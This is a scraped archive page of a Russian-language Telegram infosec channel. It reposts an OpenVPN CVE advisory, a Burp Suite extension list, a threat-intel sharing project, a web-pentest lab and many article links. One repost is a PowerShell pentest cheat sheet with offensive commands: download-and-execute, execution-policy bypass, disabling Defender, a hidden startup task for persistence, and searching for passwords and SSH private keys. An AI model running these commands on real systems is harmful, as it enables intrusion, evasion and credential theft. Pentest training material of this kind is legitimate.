Fsecurity | HH

前往频道在 Telegram

Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb

显示更多

俄罗斯216 760 技术与应用31 094

2 015

订阅者

-224 小时

-47 天

-1330 天

116

帖子浏览量

~ 6624 小时

~ 8148 小时

5.76%

参与率

~ 3

每日帖子数

Ads index

beta

帖子存档

2 015

Repost from SecuriXy.kz

#️⃣ Критическая уязвимость в OpenVPN (TLS-crypt-v2) CVE-2025-2704 🧨 Удалённая DoS-атака на OpenVPN-сервер через повреждённые и переиспользованные пакеты в ранней фазе TLS-рукопожатия. 📌 Уязвимы версии: 2.6.1 - 2.6.13 (в режиме сервера с включённым `--tls-crypt-v2`) ⚠️ Атакующий с валидным TLS-ключом или доступом к трафику, может вызвать краш сервера с ASSERT()-ошибкой. 🔧 Рекомендации: Обновитесь до последней версии Временно отключите --tls-crypt-v2, если обновление невозможно 💬 👉 https://securityonline.info/cve-2025-2704-critical-bug-in-openvpn-can-trigger-server-crashes/

2 015

Repost from Пентестер на мотоцикле

🤨 Искал медь, а нашёл золото Наткнулся на настоящее сокровище для веб-пентестера — огромную подборку расширений для Burp Suite (Community и Pro) с их описанием на GitHub. Здесь есть всё, чтобы прокачать ваш инструмент до боевого монстра! ▎ Внутри репозитория: ➡️Scanners — сканеры уязвимостей; ➡️Custom Features — уникальные доработки для Burp Suite; ➡️Beautifiers and Decoders — форматирование и декодирование данных; ➡️Cloud Security — тестирование облачных сервисов; ➡️Scripting — расширения для работы со скриптами и автоматизации тестирования; ➡️OAuth and SSO — инструменты для тестирования аутентификации; ➡️Information Gathering — сбор информации о целевой системе; ➡️Vulnerability Specific Extensions — инструменты под конкретные уязвимости; ➡️Web Application Firewall Evasion — обход систем веб-защиты; ➡️Logging and Notes — ведение логов и заметок во время тестов; ➡️Payload Generators and Fuzzers — генераторы полезных нагрузок и фаззеры; ➡️Cryptography — инструменты для работы с шифрами/хэшами; ➡️Tool Integration — расширения, связанные с интеграцией Burp Suite с другим программным обеспечением/инструментами; ➡️Misc — разные полезные расширения; ➡️Burp Extension Training Resources — обучающие материалы по работе с расширениями. А какие добавленные расширения вам больше всего понравились? 🔗 Ссылка на подборку расширений Burp Suite #github #материал

2 015

Repost from Whitehat Lab

🏃 Powershell Tips & Tricks Для выполнения некоторых командлетов необходим импортированный AD модуль 🖥 ADModule Подключаем:

Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory

или

Import-Module C:\Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module C:\ActiveDirectory\ActiveDirectory.psd1
Get-Command -Module ActiveDirectory

Информация о системе:

Get-WmiObject -Class Win32_OperatingSystem | Select-Object -Property *

Список процессов:

Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending

FailureAudit в логах:

Get-EventLog -LogName Security | Where-Object {$_.EntryType -eq 'FailureAudit'}

Сканер портов:

1..1024 | ForEach-Object { $sock = New-Object System.Net.Sockets.TcpClient; $async = $sock.BeginConnect('localhost', $_, $null, $null); $wait = $async.AsyncWaitHandle.WaitOne(100, $false); if($sock.Connected) { $_ } ; $sock.Close() }

Выполнить команду на удаленном ПК:

Invoke-Command -ComputerName TargetPC -ScriptBlock { Get-Process } -Credential (Get-Credential)

Скачать и выполнить скрипт:

$url = 'http://example.com/script.ps1'; Invoke-Expression (New-Object Net.WebClient).DownloadString($url)

Execution policy bypass:

Set-ExecutionPolicy Bypass -Scope Process -Force; .\script.ps1

Список доменных юзеров:

# Нужен AD модуль
Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate

Список залогиненых юзеров:

Get-WMIObject -Class Win32_ComputerSystem -Computer "HOST01" | Select-Object Username

Давно не логинились, но УЗ включена:

# Нужен AD модуль
Get-ADuser -filter {enabled -eq "True"} -properties LastlogonDate | ? {$_.lastlogondate -le (get-date).adddays(-90)} | ft Name

Прибить процесс:

Get-Process -Name "Notepad" | Stop-Process -Force

Список установленного ПО:

Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, Publisher, InstallDate

Мониторинг изменений ФС:

$watcher = New-Object System.IO.FileSystemWatcher; $watcher.Path = 'C:\'; $watcher.IncludeSubdirectories = $true; $watcher.EnableRaisingEvents = $true; Register-ObjectEvent $watcher 'Created' -Action { Write-Host 'File Created: ' $Event.SourceEventArgs.FullPath }

Отключаем Defender:

Set-MpPreference -SubmitSamplesConsent NeverSend
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -DisableRealtimeMonitoring $true

Задание в планировщик для закрепа:

$action = New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "YourCommand"'; $trigger = New-ScheduledTaskTrigger -AtStartup; Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'MyTask' -Description 'MyDescription'

Поиск паролей в текстовых файлах:

Select-String -Path C:\Users\*\Documents\*.txt -Pattern 'password' -CaseSensitive

Собираем SSH ключи:

Get-ChildItem -Path C:\Users\*\.ssh\id_rsa -Recurse

Продолжение следует #powershell #windows ✈️ Whitehat Lab

2 015

🔗Ссылка: https://www.securitylab.ru/news/558066.php

2 015

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

2 015

Repost from s0ld13r ch.

Threat Intelligence drop ragghhhh 🕺🕺 Рефлексируя тематику этого канала, решил запустить небольшой комьюнити проект для шейра индикаторов компрометации и угроз которые таргетят Центральную Азию (и не только) 💃 Думаю это логичное продолжение тематики TI на канале, чтобы где то можно было собрать все находки и передавать их комьюнити ❤️ В скором времени начну активно добавлять IoC с различных исследований, фидов и залью индикаторы которые смог найти в предыдущих постах 😎 Буду рад вкладу каждого в развитие TI платформы (на базе MISP) — можно присылать свои находки, ссылки на репорты, дампы, фиды и просто идеи. Даже маленький IoC может оказаться критически важным для других, все абсолютно бесплатно и на безвозмездной основе, если будет желание подключиться и помочь то мой лс всегда открыт 😸 Рад представить вам threatintel.kz 👋 🧢 s0ld13r

2 015

🔗Ссылка: https://habr.com/ru/companies/x-com/articles/897158/

2 015

🔗Ссылка: https://habr.com/ru/articles/897296/

2 015

🔗Ссылка: https://habr.com/ru/companies/pvs-studio/articles/897402/

2 015

🔗Ссылка: https://habr.com/ru/companies/bizone/articles/897062/

2 015

🔗Ссылка: https://habr.com/ru/companies/tomhunter/articles/891488/

2 015

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

2 015

🔗Ссылка: https://habr.com/ru/companies/otus/articles/897574/

2 015

🔗Ссылка: https://habr.com/ru/companies/first/articles/897764/

2 015

🔗Ссылка: https://habr.com/ru/articles/897858/

2 015

sticker.webp0.16 KB

2 015

👆Накидайте комментариев под ролик для продвижения 📈

2 015

Repost from Whitehat Lab

🖥 OWASP SamuraiWTF 5.3 Виртуальная лаборатория, основанная на 🐧 для тренировки веб пентеста с открытым исходным кодом Предустановленные лабы и инструменты:

▪️ OWASP Juice Shop ▪️ WebGoat ▪️ Mutillidae ▪️ bWAPP ▪️ DVWA ▪️ Burp Suite ▪️ Nikto ▪️ SQLMap

➡️ Home ➡️ Download 🖥 Source 🖥 Docs #web #pentest #samurai ✈️ Whitehat Lab

2 015

🔗Ссылка: https://habr.com/ru/post/725008/

2 015

🔗Ссылка: https://habr.com/ru/companies/basis/articles/897224/